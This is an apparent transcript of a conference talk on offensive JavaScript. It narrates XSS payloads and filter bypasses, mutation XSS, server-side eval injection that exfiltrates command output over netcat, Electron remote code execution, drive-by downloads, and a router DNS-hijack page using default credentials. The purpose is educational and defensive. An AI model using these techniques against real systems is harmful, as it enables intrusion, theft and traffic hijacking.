 Good morning everyone. Okay. The talk that I'm going to give is titled Captain Marvelous JavaScript. I come from an offensive security background. And over the period of years that I've got accustomed to the language, I've realized that a lot of, when I interact with developers, there are a lot of functionalities or the versatility of JavaScript itself allows you to use JavaScript not only for deaf purposes, but also to do a lot of other things offensively. So we'll take a look at some of those in the talk today. This is a very light hearted talk. It's a very informal talk for that matter. And yeah, let's go ahead and see what I have to offer here. My introduction, my name is Riyaz Valikar. I assume there are about three other Riyazs. I lost my Elanian in the morning. Somebody else took it today morning. So my name is Riyaz Valikar. I am the chief hacker at Apsaco. I lead the offensive security at Apsaco. We're a company that, we're a booted security consulting company where we kind of make our customers applications and cloud infrastructure by assessing and auditing them and providing real world guidance in the application fixes. I have several years of experience in only offensive security. I don't understand a lot of deaf world, but then from an offensive security point of view, I've done offensive security in applications, systems, the cloud, wireless, all of these areas. I also love to travel and do photography. And I call myself a comic nerd. Maybe that's going to be evident in the presentation that we have today. The talk is primarily about the versatility of JS and its application outside the dev environment in the dev world. And we'll look at a couple of unorthodox circumstances and offensive use cases where JavaScript is going to become useful. JavaScript is everywhere. The whole idea that we have an exclusive JavaScript conference now I should tell you that. As much as it is used to build stuff, several use cases exist where you can use, attackers use JavaScript to break stuff. We look at examples from the computer security industry where JS is used to detect vulnerabilities to break stuff, to build payloads, to attack humans, as well as infra. This talk is meant to introduce the audience to various applications of JS or its variations from an attacker point of view and provide real world examples while doing so. Let's start with the most common attacker view of JavaScript there is. That is XSS. Everybody is familiar with the concept of XSS? Yes? Okay. So a lot of times when we spoke to developers, the idea is that even when they have a findings available in the form of a report, the proof of concept is normally presented as an alert box. But the real question is, is that all there is to a cross-site scripting attack? Definitely not. We all know that XSS occurs when user-controlled data ends up reflected back to the page and is processed by the browser's JS engine. This user-controlled data run in the browser's JS engine will have the same capabilities as any JS that would be executing inside the browser context. So most developers look at JS and think that it's as benign as Mantis, but the way attackers see it is it can be really, really powerful. As XSS can allow us to, from an attacker point of view, we can send session data elsewhere, read secrets in the DOM, redirect users to malware-infested sites, steal system CPU to mine bitcoins, for example, steal keyboard keys, browser exploitation, do perform RCs, phishing attacks, frame content from other sites into your pages, hack into internal routers, and update the DNS or gateway. We'll look at some of these examples during the rest of the talk. There are automated tools available that allow you to perform post-exploitation with cross-site scripting, the most popular of them being BEEF, right? This is an automated tool to work with XSS-infected zombies. Essentially, browsers that are infected with an XSS payload, you can use BEEF to manage the browser itself. Some of the features that BEEF allows you to work with is fingerprint the operating system, the browser itself, identify what the user is trying to do on the system, provide a fake flash update and try to run a binary on the system, identify the internal IP addresses, scan the scanner from the infected browser, a bunch of meta-split modules also available, and tunnel traffic through the browser itself. These are some screenshots that I'll show you, a demo of BEEF itself. So what I have here, what I have here is a simple application with content that is reflected. If you notice the name parameter in the URL, no matter what I type here, it gets reflected here. If I just type my name, it comes up here. Now, a lot of times, the most simple obvious payload is the script alert script, but we're going beyond that. As an attacker, what an attacker will do here in this case is run the BEEF server that allows you to manage a remote infected browser window. So what I have here is the UI panel of BEEF. On the client or on the target that I want to work with, I will pass, I will get the user to connect or rather I'll get the user to run a payload that I have. Essentially embedding a script, a hook.js from the remote attacker machine, and what I should have here as the attacker is the browser come up in my BEEF console. From here, I would be able to run commands that BEEF allows you to run with on the remote browser. Essentially get... There are different, different payloads that I would encourage you to go play with. Try out the fingerprinting with the browser, figuring out if the browser is vulnerable to any of the exploits. Use the browser to move into the network using MetaSpread, for example. BEEF as a framework allows you to perform additional attacks beyond your standard alert box. The idea essentially that I'm trying to convey is that an XSS is not only the alert or the session cookie is being stolen, because developers come back with, hey, my document or cookie has HTTP only set so you can steal my cookies, but we can do a ton of other things with your client's browsers. That's the power of how BEEF would be used in the real world. I'm going to keep the demo short because I have a lot of content to cover. Let's look at another variation of XSS that is not very widely known, but has been spoken about in the media quite recently because of a researcher discovering an XSS in the Google search bar. The XSS that I'm talking about, a variation of that XSS is called Mutation XSS. Mutation XSS essentially was discovered way back in 2007, was primarily described by a security researcher called Mario. Anybody who's done a lot of security related work with JavaScript and XSS, Mario is not an unfamiliar name. The technique relies on browser engines modifying the HTML that is provided as an input. The security researcher called Yusoko Hasegawa in 2007 noticed that when he was trying to do a print preview function on one of the applications, the attribute of an element was bleeding into the document. Essentially, trying to see if user input was provided as this, the piece of code that is on the top, the browser would mutate the user input and produce the piece of code that is at the bottom. That's not what is expected. If you've noticed, especially if you're writing the HTML by hand and if you've written, most HTML pages would work even if you don't have the doc type defined. You could simply have an HTML, no body, only text and if you open it in the browser, the browser modifies the DOM so that it adheres to the doc type that the HTML relies on. That's the mutation I'm talking about. User control input is innocuous. It's harmless when it passes through the service filters, client filters, any web application firewalls there are, any browser protections there are. Chrome itself has an XSS protection engine. All of this is harmless data when it passes through all of these things. When it finally renders inside the inner HTML, the browser mutates the input causing an XSS to come out over there. Over the years, multiple vectors have been discovered. We'll look at the Google XSS that has been published recently. Most attackers would dream of getting an XSS on the most widely visited page on the internet. No matter what browser you use, you would have seen this page. You would be living under a rock if you've not seen this page. The essential idea being that if you pass what I have described there as a standard script, alert input that is used to detect XSS, most attackers would want this to happen on the Google homepage. But when looking at the background, sometime back in October, in September 2018, a developer working on one of the libraries called Clojure created a commit that removed part of the input sanitization. And between that time and February 2019, Google search was vulnerable. There's no notification or any public news about whether it was exploited in the wild, but it has been vulnerable for about six or seven months that it was out there. A researcher called Master Tokinogawa discovered that this allowed a mutation to occur when a no-script tag was used with malformed HTML. The essential idea being that if the way the browser mutation occurred was, if you try, this is an example, and when the slides are going to be visible, available to you folks, I would recommend that you try this out. Save the first part as an A.html and the second piece of code as B.html, and you open both in Chrome and view the console for rendered source. What you notice is with the first piece of code, you would have the browser pass through the HTML, reach the part with the div, and notice that the div contains a script tag. So the browser's HTML engine passes the div and then modifies the DOM content so that you have script as a valid script tag, closes the script tag, and the broken div that is there inside becomes part of a title attribute. This is how the browser mutates the broken HTML that is there, the invalid HTML. But in the second case, surprisingly, when you have script, the same thing, you just move the script outside. You have the first opening tag as a script element, and inside which you have the div title. And if you notice if that's all your HTML is, the browser will modify it, move your script to the head tag inside the head tag, and the body will contain a broken floating element, right? Based on these mutations, right? Imagine that if you could pass malicious HTML, malicious JavaScript in the form of maybe an alert one or something like that, and it would go through any of the filters or WAFs because in that context, it's not executable, which is what happened with the Google mutation, the Google mutation accesses. Closer library utilized the template tag to obtain safe HTML. Now, the template tag is an interesting one because when you assign JavaScript to an or rather when you assign HTML to inner HTML of template, what happens is JavaScript inside that is not parsed, right? But if you assign the same thing to a div inner HTML, for example, JavaScript inside that is going to be parsed. We'll take a look at it with an example. So essentially, if you pass a no-script tag containing a broken no-script tag and an access vector that gets parsed by template as standard HTML but gets rendered by div which is where the execution of JavaScript would occur. I'll do this in the console so that's a little more clear. So what I have here, I'll just go to... I normally just type then just to save time. What we have essentially here is if you look at, right, I've created a div element, okay? What I'm doing now is I'm adding the image SRC, right? The image standard image SRC on-error alert to the div inner HTML. As soon as I hit this, it gets parsed as HTML and JavaScript on the page and then you have an alert one executed, okay? Now interestingly, if you have a template created in the same way, right? And if I pass the same to the inner HTML of a template tag, it gets processed as a string, right? From there on, you could filter any malicious... You could filter any malicious attributes that are there, like the on-error attribute, and this is how Clojure's input sanitization works. You could then assign it to a div and what you would have is a harmless development, right? So essentially, you've kind of filtered out the accesses, you know, the attack here and the payload here, and then you've created plain old HTML. But in the Google accesses, what happened was when the template was created, right? And this no script of... This was attached to the inner HTML, right? Essentially giving you a string, but because the div what you'd have is the inner HTML of the div, assigned from the template, it caused the non-vulnerable part of... Rather, the JavaScript from inside the script tag to become vulnerable. If you notice, the way it was rendered is very different from the way a template tag would see it, right? If you notice the div, right, you would have the no script take care of the peak title and then you have a valid payload here that gets executed. And this is what happened in the case of the Google search bar, causing the attack to succeed over there. Let's look at another case of where JavaScript can become useful to attackers, right? Now with a lot of node programming coming up and with Express being the de facto for a lot of JavaScript-side-server programming, the essential idea being that you move the power of JavaScript to the server, the computation power of JavaScript to the server with JavaScript now having access to the operating system and the system resources over there, right? One of the plain old things that attackers like doing when attacking node servers is the idea of executing commands and code on the server itself using native modules that are present inside Express. The essential idea being, and this is across all languages, regardless of whether it is node or not, the idea is that user-supplied data should never be used inside an execution context without first checking if that data has any special meaning inside that context, right? And this is true for all programming languages, right? The major dangers of server-side user code is that it is extremely difficult to understand and verify where the user code is coming from, right? And a lot of developers restrict their idea of where the user code is coming from is to the browser, right? And in that also, the part of the browser is where the request body is, right? So that is going to be sanitized. If you're going to send any attack vectors through the request body, that is going to be sanitized by most developers. But failing to understand that even the headers for that matter that are coming from the client, including the user agent and the cookies, and all of these things can be tampered with using a simple MITM proxy like Burp, for example, right? All of this is user input, right? There are cases of second-order attacks where your user input, which is benign, enters a system on the server and then is processed by another application. Like imagine Facebook, for example, if you pass malicious XSS-related malicious XSS data or an XSS payload, for example, to Facebook, Facebook will store it and Facebook is smart enough to prevent your access attacks there. It'll encode or HTML output encode the data that you pass. And what you see is instead of code executing, you'd see tags, right? They'd be converted to their equivalent HTML entities. But another application that is relying on the Facebook data that has been uncovered, that becomes vulnerable because it trusts that Facebook is going to produce non-malicious data, right? So user data, the attack vector could come from anywhere. So you need to ask yourselves, where is the data coming from? Where will the data be processed, right? And what is the execution context of where the data is going to be processed? Will the function processing the data validate if the data is benign within the context of that execution? The interesting thing for attackers is that server-side processing has access to the operating systems' resources. And user-supplied data may be able to traverse server-side objects to use modules that are already available on the system to cause interesting things on the server. Especially code execution is what most attackers go after. I have a piece of very shoddily-written node, express code. Can you tell me what's the bug here? So essentially, there's an endpoint called greetings. It accepts user input and it prints it out to the screen, right, through the response context. What is the bug here? Yeah, eval and everybody's like, oh, bug, bug. The essential idea is that you do not pass user data without sanitization into an eval context, like the eval function itself, set timeout, there is set interval, and the function context itself. Do not pass user input without sanitizing into functions that can evaluate your code from a string-based input. I'll do a demo of this. This is a very crudely-written web service and has multiple routes that perform multiple functions, written in no express with MongoDB backend. We'll take a look at how this can be attacked. We found similar examples during assessments and other things, but let's see. So what I have here is a web service which has an auth function where you provide a username and password. It generates a JWT, which I have put in the history. But essentially, if you pass a name variable with the token, it prints your name, right? And one of the first key things during assessments is also, and especially if you're testing in points like these, is to try out as a test case, math works across all languages and test cases that we've seen. It doesn't matter if it's SQL injection or you're trying to do this here in terms of a server-side JS injection. But essentially, if the user data that you pass is going to be evaluated, now you know definitely 5 minus 2 is 3 and it's being evaluated here, you could try out other JavaScript related objects. So essentially, you know that there is some avenue of attack here, okay? Now given that, you could use the file system libraries on Node itself to read files on the system, or if you wanted, you could try and execute commands using something like the required child process, using the child process module, right? And essentially transfer the output to your attacker servers. Essentially what I'm doing here is I'm saying use the response object to send, use the send function to execute and send the output of this. What I'm essentially doing here is I am using the child process module and the exec method from there to execute a command and the command is going to pipe the output of the command and send it over a netcat to the attacker. So to be able to catch this, I have to start NC in listening mode on port 9000. And when I run this demo file, no token provided. Sorry about this. The token is incorrect. The token is probably expired soon. I said this up before the talk. So what has happened here is the code is executed on the server and the output of ID has been sent over netcat, right? As the attacker, you could also go a step further and get a reversal out of that box. I'll add the reversal bit into the slides and you can take a look at it post a talk. Another very interesting area of research for attackers is the desktop world, right? And JavaScript has moved to desktop as well via Electron for that matter. JavaScript is now on the desktop via Electron and Electron is essentially a Chromium front end with Node.js back end, which essentially gives you a pseudo-native operating system agnostic platform. You could run Electron applications across different operating systems. And a lot of commonly used applications have been ported to Electron. Skype or Slack for that matter, which we actively use. This has been already moved to Electron. From an attacker point of view, the attacker looks at an Electron app. You have an application that's going to parse and analyze and execute JavaScript that's running on the desktop, right? And to which the attacker can send an input. It could be a message that the application understands, network traffic, hosted content, shared file, or any of the features that the application uses. The app uses the JS engine to parse the user-provided input. And you could have essential execution capabilities there. You ask yourself what could go wrong in this context. There are examples of Electron apps that are commonly used. Visual Studio code, the most popular one of them, in my opinion, at least. Slack and Skype. There's a project on GitHub that has moved Windows 95 on Electron. I mean, why would somebody do this? But you have Windows 95 on Electron. I thought it was pretty cool. Code execution using JavaScript in desktop applications. There are two use cases, case studies I'll cover here. One of them being with the Microsoft product itself. There's a code, a piece of program called the attack surface analyzer, which essentially takes a snapshot of the system and compares it based on what changes were done to the system. It's a tool that takes a snapshot of the system. And before and after the installation, it does like a diff, right? And you can see what registry keys change and to do troubleshooting essentially identify what attack surface increased for you on the operating system level. ASA uses Electron.Net, which is a wrapper around normal Electron, right? And uses ASP.Net as a core application. Electron APIs are then invoked using Electron.Net, using a bridge in .Net. And RC was discovered in ASA due to this is a very infamous flag in Electron apps called node integration flag. And this has to be said to false, right? Otherwise, an XSS could result in code execution capabilities. This flag was set to true. This allows the JavaScript payload, if accessed through an XSS, that would run on the desktop app itself. You could use this to spawn a process on the desktop time. What you have here in this case was this was set to true in the webpreferences.cs file. It allows the calling of other modules. Common ones being the process underscore app or child process. An XSS can result in server-side code execution. A piece of code that I have here uses the process underscore app to create and spawn a new process. Calc in this case, right? And when you encode this, because you need to send it over HTTP.Netx protocol, you need to encode this. You could use an HTML, sorry, you could use a JavaScript encoder, essentially converting it to each character to its ASCII equivalent. And then on the server, process it using string from car code. When I say server, I'm talking with the desktop client here, right? Using an encoder to convert this either to base 64 or car code so that it can be transferred over the wire. You would have the standard image SRC payload on error eval, the encoded payload that you have sent. Essentially, this would result in an XSS giving you shell execution capabilities on the desktop client. This was fixed by Microsoft. The other one, and this is a pretty interesting one because this did not essentially rely on any code nuances inside the application itself, but in a way how Node.js manages arguments that are passed to the native handler for arguments in this case. So Electron platform itself was vulnerable to protocol handler vulnerability, affecting apps that use custom protocols. When I'm talking about custom protocols, you must have seen sometimes when you install an application for Windows, especially in the registry, an entry is made if the application registers the custom protocol handler, right? For example, the tel protocol, tel protocol, if you find it in HTML, it's going to look up as an href. When you click on it, Skype will launch, right? The operating system knows it has to launch Skype when a tel protocol is clicked because that's registered with the operating system. Similarly, Electron apps can register themselves as with a protocol handler, right? In this case, there was a cryptocurrency wallet handler called Exodus, right? And this had registered the Exodus protocol, but any application that would register a protocol with the operating system would instantly became vulnerable because of how Electron managed and the command line arguments are to pass. Funnily enough, you could simply do, if you look at the HTML code there, you could do a window.location and use the protocol handler to launch the app on the system, right? And if you look at the application's command line arguments using a tool like process monitor for that matter, or process explorer in this case, you would see that the Exodus binary was launched with the protocol handler that is specified here, right? Using a list of, now because this is going to be handled by Chromium, using a list of command line arguments in Chromium, you try and find out a command line argument that Chromium would support that would allow you to execute operating system commands within that context, right? And there was, definitely there was, there was a command line argument called the GPU launcher, right? And if you pass an argument like this, and this is the exploit code, this is all there is as the exploit code, you would have a script window.location Exodus with some random string hyphen hyphen gp launcher. If you notice this double code that is here, this closes the command to Exodus and anything that is passed after this is sent to Chromium. That was the bug. And essentially what we would have is the launch of command prompt on the desktop line, right? In both the cases, the first one is the node integration bug in this one. In both the cases, the application environment did not sanitize user input that came in, right? In this case, it allowed the user input to reach the Chromium command line parser. And in the first one, because your user, your node integration allowed you to execute operating system level commands using the node model libraries. Now, another interesting case that attackers talk a lot about when it comes to JavaScript is to bypass filters. And this is very common in a lot of in the bug bounty community, especially everywhere in the world, that there are applications that are somewhat protected against input validation bugs like XSS, right? Your plain old vanilla tricks about script and images, RCS and SVG on loads. These are standard inputs that you would give to a field that you think is vulnerable to an XSS. These are normally protected, right? And developers have moved to a place where they either rely on the framework or they add additional protections around the code itself. Some of the more common bypasses that attackers use are to change the representation of how JS interacts with objects, right? Or pass objects notation and entities to the processing unit with a different form of the representation. Like instead of sending document at cookie, you would send a document square bracket cookie, right? Both of these point to the same thing, but because the way the code is written, one of these may be able to pass through the filters that are there on the server. If the proof of concept is to simply generate an alert box, right? And that's that's more than enough in a lot of cases to get people to take note of what you found. Depending on the filter being targeted, you can analyze the output that is received for various mutations of your representation, right? And primarily perform any of the following manipulations. You represent an object completely differently, although pointing to the same object. You use encoding techniques, right? You use string and object manipulation to access functions and attributes. And you rely on browser and JS in engine implementations to transform objects. The last one being the mutant mutation access that we saw earlier, right? These are a couple of examples from the real world and stuff that has worked in our case as well. When we are assessing an application, right? When we've been told that this is this application defeats access, we all protections are in place. We've had success with some of these. The alert access, for example, does not use double quotes and you can still pass a string. The eval alert, if alert is blocked on the server. Function alert, if alert is blocked and eval is blocked on the server. On-error alert throw one if brackets are blocked, for example, right? All of these are variations of how you would bypass custom filters that are written on the server, okay? The on mouse over being one of my favorites. This happened in a real world example where the developers are blocked on functions, all on click, on load, all of these functions. Essentially, if you would find that in user input, they would delete the word on mouse over, for example. You could still bypass it by simply doing on mouse, on mouse over. So the word on mouse over get deleted and what you would have is the concatenation of the rest of the string. And then you would have success alert there. And JS can get real weird real quick. As for attackers, especially without understanding how primitives and other things work, let's get to looking at how JS, in its most weirdest form, cases can work and bypass a lot of these filters that are available. I did a small flash talk in Bangalore and it's available on my GitHub as I'll put it in the references where noticing using only six characters, there are ways by which you can generate complete payloads for your attacks, right? And excuse me for the profanity, but the language itself is called JSfuck, right? And it's a very esoteric educational programming language where you can pass a function and build code, but all of that is going to be rendered inside using only six characters. I'll do a demo of this. The essential idea is that you use keywords like false, for example, can be obtained from an exclamation bracket, square bracket, for that matter. And a true can be obtained from two exclamations and a square bracket. And each of these can then be used to create a string, right, in this form. So if you have alert zero, for example, you can convert the entire alert zero into what you see here, right? And then you can use this as the execution. Let me just pull up a window that I have already available here, okay? This is a proper website for this. If you want to pass, you know, if you have your payload, you can enter that here in hit and code. What you have here becomes your payload. So if I just go to the console, right? And to see if it works the way it is described, right? This is alert one because each of those characters, what you're constructing is the word A, the string A, the character A, L, E, R, T with brackets and one, and then are sending all of these to eval, right? So each one of these is the representation, right? And then you can, this allows you to auto construct and create your payloads. And we've used this to bypass filters in our assessments as well. So in the real world, this definitely works. So depending on the context where reflection is occurring, different forms of input can be tried for dynamic filters for that matter. That strip of a blacklisted words like on mouse over the example that I gave you earlier, you can apply this test case. Some filters will not detect payloads sent using new line or white space characters, right? And you can then try tab characters, the percentage 0D0A in between. There was a bug in SharePoint and the way .NET handles JavaScript payloads. Anything that came after a tag would be, anything after a tag and a character would be rendered innocuous by .NET. But there was a bug in SharePoint where you could pass an ampersand 00 after a tag immediately, which the server would pass through and then your payloads still get executed, right? Because you're passing a null character to the server. This is another of my favorites where in the real world, we've seen how attackers will use malware and obfuscation to primarily attack targets. And we were having very interesting discussion yesterday. A couple of my friends here about how attackers do not go after a lot of tech folks. But if somebody wants to do like a mass attack, they would, it's easier to throw the payload at about 500 targets and then receive a data back from two. Then focusing on only one or two, right? Unless you're like being targeted by three-letter agencies. The essential idea being that almost all modern malware infections, social engineering attempts, phishing and targeted ad campaigns are now delivered over the internet, right? Attackers essentially will compromise high traffic websites and they'll inject malicious payloads, JavaScript, especially as part of the page, right? This could end up being an iframe on the page. And then as soon as you as a user would browse to the page, the JavaScript would execute in your browser context. The compromise may have been done using a stored XSS, a weak admin password, SQL injection, doesn't matter. But the essential idea being that the browser's code is modified, sorry, the HTML is modified. So when a user visits this page, the iframe or the JavaScript loads in the browser and the attack happens on the client, right? Attackers also heavily rely on users' browsing habits, right? Especially clickbaity articles. A lot of us do this. You know, the tons of these articles being posted on Facebook or LinkedIn and Oracle if it is still alive. I'm not on social media. But the essential idea being that a lot of clickbaity articles and, you know, especially if somebody is trying to download like free software and other things. If you don't know, if you don't have an idea of what you're going to be clicking, you could fall prey to one of these attacks. Because it's extremely easy to get users to navigate on the internet to, you know, the attacker-focused sites. As the idea of this attack is called a drive-by download, right? And I was trying to figure out a meme from Marvel to get this out here. But the idea being that you as a user is made to go to a malicious, sorry, a non-malicious website, a very ordinary looking website. And then the application takes over how the next set of steps are going to be. Now, I was trying to get this done on my phone, right? And I randomly tried to browse to a site, and then I have this thing come up on my phone that says virus detected. Oh, virus detected. Let me see what this is. It says dangerous virus was found on the Samsung Galaxy S7. I click on OK. It says tap OK to install app to remove virus. A lot of people will tap OK to click to remove virus. I don't want a virus on my phone. So I clicked OK. And then it says scan completed. Your phone is in danger. Malicious virus is found. Remove virus. I said OK again, right? I mean, I didn't do this obviously on my phone. There's a test phone that I use to do this. The idea is that I have 11 viruses and I have to click. There was another screenshot which said that my battery is going to die out or it's going to explode if you fly out on a plane or something like that. The idea being that fear drives a lot of user actions on the internet, right? I wouldn't want to be a person with a virus on my phone or my phone exploding in the middle of a flight, right? So I would go ahead and click on remove virus now. Essentially, then a prompt comes up saying that you want to install this software. And operating system manufacturers try and reduce the amount of impact that this will have by asking you that this application that you're going to install now is requiring permissions to access your contacts or camera or make phone calls and other things. If at that point in time you make no, no, no decisions and deny access, you're still okay, right? On the browsers, it's very different. He's confused about what happened to his phone. The attack chain essentially being that users are tricked into navigating to a site laden with JS that profiles the browser. Any add-ons that you have, the operating system and other plugins that may be ripe for abuse, flash, for example, in that matter. A legitimate site may also be affected with malicious JS via a server-side vulnerability or compromised content delivery network. A weakness in the browser, a third-party component is then exploited to download and run additional code without user interaction, right? And this is the key bit. Sometimes user interaction where a lot of folks, sorry, where it says that click here to win an iPhone. You may have seen any of the shady ads on the internet and you would go ahead and click because you want to win an iPhone. And then it asks you to download this binary because it has a scanner system for antivirus, sorry, for viruses. And this is one of the most common ways of payload delivery where the user has got to download and run a binary. I mean, if you're able to click and download and run a binary from an attacker, it's no longer a system anyways. The user may additionally alternatively be phished to download. That's what I'm talking about, and run a binary irrespective of a browser weakness, right? Sometimes an attacker sees that the browser is passed and it's fully up to date. The attack mode changes. And then you're offered to download something and run on your system. Then obviously when you run the binary on a native and the machine, this gives you gives the attacker access to the entire machine as well as the network and you could become part of a larger bot in that case. An example exploit I'll cover is something called as the AOL SuperBuddy exploit. A legitimate site was infected with malicious JS, right? Using SQL injection. Using SQL injection, you'd probably go after data, but attackers here use the SQL injection to modify HTML on the server. The HTML code that was there was injected in all the pages on the site. So as a user, it's a very popular high traffic website. If you browse to it, your browser would execute the JS that was there. As part of analysis, the people who analyzed this, the script checked for a cookie to verify the browser had been attacked before, right? If no cookie was found, then a new cookie was said to mark the beginning of an exploit. An iframe was created using JS with zero dimensions, with zero and hide zero. And this iframe loaded another script from a different domain. By using the user agent request field to detect what user's browser was. If you're coming from a phone, you'd get different content. If you're coming from Mozilla or Chrome, you'd get different content. The return script used obfuscation techniques in polymorphism to make the analysis difficult. And especially use the location. This is a very common script. We'll use the location.hrf key to decode the encoded string. And this makes it difficult because you can't set the location.hrf without making the page navigate, right? So we've made the static analysis difficult for this bed. A sample of the partially obfuscated code is shown here. The script attempted three different exploits in the loop, targeting different vulnerabilities, right? And if the AOL SuperBody plugin was installed in your browser, it created an active object from there and tried to execute a function. The function essentially did a technique called as heap spray, trying to put payload onto the browser memory. And then an actual target was triggered using this well-documented vulnerability that allowed it to create an icon but caused an integer overflow. That caused an execution to load the payload and then take control of the browser. This is something that has worked quite often in our cases as well. Where JavaScript can be used and this is slightly difficult to imagine. Imagine you're browsing a website and the browser is able to change DNS settings on your home router, right? Imagine you go to, you open your email or you browse to Wikipedia or something like that and then the site is able to change your settings on your on the router that you have at home, right? There have been a lot of well-documented cases on the internet where code has been written to identify what is your home router. There are different models that make for dealing, TP-link, for example. Identify what model you have and then brute-force credentials on this router if you've not changed it from admin-admin. A lot of folks don't, right? And I've seen a lot of tech-savvy folks not change their default credentials, right? And using these, change settings on the internal router. So what happens in this case is a browser, a user browsers to a website or a browser like Chrome or Firefox, right? And the browser loads a piece of JavaScript that uses WebRTC to figure out the internal IP address of the machine. This IP is then passed to another function that uses it to create the presumed gateway address, right? And load an image essentially trying to fingerprint the internal router, right? Whether it's a dealing or TP-link or whatever. The image load URL has the default credentials passed so that you pass through a basic auth to go through. And then on successful load of the image, additional functions are called to change particular settings inside the router configuration. For example, if you look at this very simple HTML page, right? There's a win iPhone and you want to win an iPhone so you go there. And then what happens in body on-load is a function called body on-load is called which essentially uses WebRTC to obtain your internal IP address, right? Once your internal IP address is obtained, another function called do-changes is called, right? This obtains your... rather creates your gateway IP address and this is a very what you call condensed form of the real code, right? In reality, you would not assume that your IP address your gateway is .1. You try different variations, right? And you try different port numbers for that matter. And this is a TP-link exploit but there are different exploits available for different types of routers out on the internet. So what we'd have here is essentially writing a div that says load an image whose source is admin-admin with the gateway and then images slash logo with height one and width one, right? And as soon as you do this if the load is successful of that image set DNS to rather run a function called setDNS which is here. So what happens setDNS is a simple new image is created whose source attribute is tagged to this, right? And if you notice this is a get request that changes the DNS settings, right? And from our HTML HTTP days, a get is not supposed to change server content, right? A get is supposed to be a idempotent request, right? The essential idea being that methods like post, put and delete are supposed to be the ones that should change content on the server. But we've seen real-world implementations where on the internet a get request would change something, right? And developers use get parameters to change server-side code, server-side data for a user. In this case the router's DNS settings are being changed using a get request and in the second one, the router's administration console is being made public, right? So that the attacker can then access the administration page remotely from over the internet. What could go wrong from here are multiple things, an active and the obvious, most obvious case being the active and passive man in the middle attack a phishing attack to steal credentials by loading attacker control domains. Imagine if an attacker is able to take control of a DNS, it means that the attacker can make you go to any website, make it look like you're on the right website because DNS is what controls what you see, the content, right? Your browsers don't understand anything else, right? The URL, the domain is only for humans to feel nice about where they are. The way the internet requires is for the domain to point to a correct IP address which is resolved by a DNS. The way the DNS is attacker controlled, it's already game over, right? Boss program updates received from malicious domains will pass binaries to the system. So you're trying to suppose you're on a network whose DNS is something that you don't control, right? The DNS can make, you know when one of your program tries to fetch an update, right? Suppose visual studio code for that matter and it doesn't auto update as soon as it starts and the DNS resolution points it to a different binary. If there's no signature verification of the downloaded binary, you would end up running a malicious executable. Attacker essentially has full visibility and control of the target network if the attacker can control DNS. A couple of closing notes. I was afraid that I'm not making it in time, but to close JS is not only used to build stuff, but actually used by attackers to do all sorts of cool things, right? For developers do not trust user input anytime, anywhere regardless of where it is coming from, from trusted environments from non-trusted environments. Users, patch your browsers, update your apps, change default credentials everywhere, right? Be wary of the sites you visit and trust me, there is no Nigerian prince who wants to give you money. Okay? Thank you so much. These are the references that I've used. This is my contact information. Thanks, Riyaz. Any audience questions? Anything that you want to ask? I'm sure you have a lot of security questions. I'll be available throughout the day if they want to come and talk to me. They can do that. I mean, you can feel free to ask the questions. I mean, there's no point in keeping it in your head. Yeah? There are a lot of times when one of you has a question and then you ask, you ask. That's happening at the back. I mean, I can see that's what I'm trying to ask. Karen has a question. If I heard you correctly, your question is do modern browsers predict that they're going to drive by downloads? Yeah. So it's not a question about how modern the browser is. If the browser has an unpassed vulnerability, right? Or if there's an exploit available for the browser. And browser vendors for that matter take browser security very seriously. Even crashes for that matter. When I put the slides out, there is another section on browser fuzzing that I didn't cover because of time, but I'll have it in the slides. Essentially, there are companies for you finding crashes in browsers, right? And it may not be an exploitable bug, right? You might be limited by your capabilities of developing an exploit code. But if you are able to successfully crash a browser, there are companies that are willing to pay because this is lucrative in the terms of attacking users. The idea being that if you have a browser that's vulnerable to JavaScript being able to push content to your system, right? You've not initiated the traffic, especially. What would happen in that case is that because it's a vulnerability that they're exploiting, doesn't matter if the browser is modern or not, you would definitely be vulnerable. But the alternative, as I mentioned in the slide, was that attackers assume that you probably have a patched browser. What they rely is then on the users inability to differentiate between content that they believe is malicious and content that they believe is not malicious. And if you're trying to download a torrent, for example, on the internet, and if you go to any of the shady websites where you'd get your torrent file, there'll be one tiny link somewhere down that says, that is the actual link to download a torrent. But there'll be one large, big download now button that will actually download something else on your system, right? And especially I've seen a lot of students do this where they'll be like, I got a torrent, but it was a .exe. I don't know, that's not how torrents, torrents have a .torrent extension, right? Because they clicked on the big download now button. And that's what attackers would rely on. Thanks. Any other questions from audience? Thanks Rehaaz. Thank you so much folks.